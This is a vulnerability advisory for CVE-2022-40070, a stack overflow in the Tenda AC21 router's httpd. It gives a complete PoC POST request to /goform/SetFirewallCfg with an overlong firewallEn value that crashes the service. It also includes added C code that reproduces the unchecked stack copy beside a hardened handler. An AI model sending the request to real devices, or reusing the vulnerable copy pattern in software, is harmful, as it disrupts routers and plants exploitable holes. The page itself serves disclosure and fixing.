CVE-2022-40070: Vuln/Tenda AC21/8 at main · xxy1126/Vuln

Tenda AC21 V16.03.08.15 is vulnerable to a stack buffer overflow in bin/httpd, function formSetFirewallCfg.


Tenda AC21 (V16.03.08.15) contains a stack buffer overflow vulnerability

Overview

  • Manufacturer's website: https://www.tenda.com.cn/
  • Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

Product information

Tenda AC21 (V16.03.08.15), latest firmware version; emulation overview:

Description

1. Vulnerability details

Tenda AC21 (V16.03.08.15) contains a stack overflow vulnerability in the file /bin/httpd, function formSetFirewallCfg.

An attacker can trigger the overflow through the firewallEn parameter of the request handled by this function.

In the decompiled handler, the parameter value (s) is copied into v4, a fixed-size buffer on the stack, without any length check. A value longer than that buffer overwrites the stack frame, which is the stack overflow. Because firewallEn is only meant to carry an on/off flag, any value longer than a few bytes is already malformed input that the handler should reject before copying.

2. Reproducing the vulnerability and PoC

The vulnerability can be reproduced with the following steps:

  1. Boot the firmware with qemu-system or another method (or use a physical device).

  2. Send the following PoC request (note that the request carries the device's session cookie; the handler is reached through the authenticated web UI):

    POST /goform/SetFirewallCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 1364
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adamlcvb
    Connection: close

    firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

Sending this PoC crashes httpd, which the firmware then restarts (a denial of service). The advisory demonstrates the crash only; whether the overwrite can be steered into code execution is not shown on this page.
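To make the defect concrete, here is an added example in C, written for this page and not taken from the Tenda firmware or from the advisory author's repository. It reconstructs the pattern the advisory describes (the firewallEn value copied into a fixed-size stack buffer with no length check) next to a hardened handler that treats firewallEn as the one-byte on/off flag it is, and it builds a body shaped like the PoC above to measure how far the unchecked copy would overrun. The buffer size FIREWALL_BUF, the form parser and every function name are assumptions; the 1353-byte count is the PoC's Content-Length of 1364 minus the 11-byte `firewallEn=` prefix.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the stack buffer (v4 in the decompiler output). The real size
   inside the Tenda binary is not stated in the advisory. */
#define FIREWALL_BUF 64

/* Find key in an application/x-www-form-urlencoded body. Returns a pointer to the
   value and stores its length (up to the next '&'), or NULL when absent.
   Percent-decoding is omitted: the PoC value is plain digits. */
static const char *form_get(const char *body, const char *key, size_t *len) {
    size_t klen = strlen(key);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            const char *end = strchr(v, '&');
            *len = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');           /* advance to the next key=value pair */
        if (p) p++;
    }
    return NULL;
}

/* Vulnerable pattern, as described for formSetFirewallCfg: the value (s) is copied
   into a fixed-size stack buffer (v4) with no length check. Shown only beside the
   fix; never call it with untrusted input. */
int set_firewall_cfg_vulnerable(const char *body) {
    char v4[FIREWALL_BUF];
    size_t n;
    const char *s = form_get(body, "firewallEn", &n);
    if (!s) return -1;
    memcpy(v4, s, n);                 /* writes n bytes regardless of sizeof v4 */
    v4[n] = '\0';                     /* plus the terminator */
    return atoi(v4);
}

/* Bytes the vulnerable copy would write past the end of v4 for this body,
   computed without performing the copy, so it is safe on the PoC body. */
size_t vulnerable_overflow_bytes(const char *body) {
    size_t n;
    const char *s = form_get(body, "firewallEn", &n);
    if (!s) return 0;
    return n + 1 > FIREWALL_BUF ? n + 1 - FIREWALL_BUF : 0;
}

/* Hardened handler: firewallEn is a boolean switch, so accept exactly one byte,
   '0' or '1', and reject everything else before it reaches any buffer.
   Returns 0 or 1 on success, -1 if the parameter is missing, -2 if malformed. */
int set_firewall_cfg_safe(const char *body) {
    size_t n;
    const char *s = form_get(body, "firewallEn", &n);
    if (!s) return -1;
    if (n != 1 || (s[0] != '0' && s[0] != '1')) return -2;
    return s[0] - '0';
}

/* Constructed input shaped like the PoC: "firewallEn=" followed by count '1'
   bytes. Caller frees the result. */
char *build_poc_body(size_t count) {
    const char prefix[] = "firewallEn=";
    size_t plen = sizeof prefix - 1;
    char *body = malloc(plen + count + 1);
    if (!body) return NULL;
    memcpy(body, prefix, plen);
    memset(body + plen, '1', count);
    body[plen + count] = '\0';
    return body;
}

/* Result of the hardened handler on a PoC body of the given length. */
int safe_result_for_poc(size_t count) {
    char *body = build_poc_body(count);
    int r = body ? set_firewall_cfg_safe(body) : -1;
    free(body);
    return r;
}

/* Overrun the vulnerable copy would produce on a PoC body of the given length. */
size_t overflow_bytes_for_poc(size_t count) {
    char *body = build_poc_body(count);
    size_t r = body ? vulnerable_overflow_bytes(body) : 0;
    free(body);
    return r;
}

int main(void) {
    size_t poc_len = 1364 - 11;       /* Content-Length minus "firewallEn=" */
    printf("unchecked copy overruns v4 by %zu bytes\n", overflow_bytes_for_poc(poc_len));
    printf("hardened handler returns %d for the PoC body\n", safe_result_for_poc(poc_len));
    printf("hardened handler returns %d for firewallEn=1\n", set_firewall_cfg_safe("firewallEn=1"));
    return 0;
}
```

The point of the hardened version is not a bigger buffer but a semantic check: the handler knows the parameter is a flag, so it can bound the accepted length to one byte and never needs an unbounded copy at all. Where a parameter legitimately carries a longer string, the equivalent fix is to check the length against sizeof the destination before copying and reject (not truncate silently) anything that does not fit.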
